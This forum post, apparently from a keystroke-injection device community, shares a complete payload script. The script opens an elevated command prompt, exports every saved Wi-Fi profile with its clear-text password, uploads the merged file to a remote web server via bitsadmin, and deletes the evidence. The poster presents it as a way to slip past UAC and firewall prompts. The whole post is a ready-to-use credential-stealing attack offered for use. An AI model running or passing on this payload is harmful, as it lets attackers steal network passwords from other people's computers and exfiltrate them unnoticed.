crashie Posted March 10, 2013 Share Posted March 10, 2013 (edited) Just made this little script/payload that exports the Wi-Fi passwords on Windows Vista/7/8 and combines and renames it to wipass.xml and then uploads via HTTP to a webserver running IIS with BITS extension. This way there is no need to worry for UAC or stuff like that.. and since it's HTTP upload the firewall won't ask questions.. :P Here's the script/payload: DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear ENTER DELAY 200 STRING copy /b %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml STRING bitsadmin /transfer uloaded /upload /priority HIGH http://server.com/upload/wipass.xml %USERPROFILE%\wipass.xml ENTER DELAY 2200 STRING erase /Q %USERPROFILE%\*.xml ENTER DELAY 200 STRING exit ENTER Edited March 10, 2013 by crashie formatting [code] tags Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.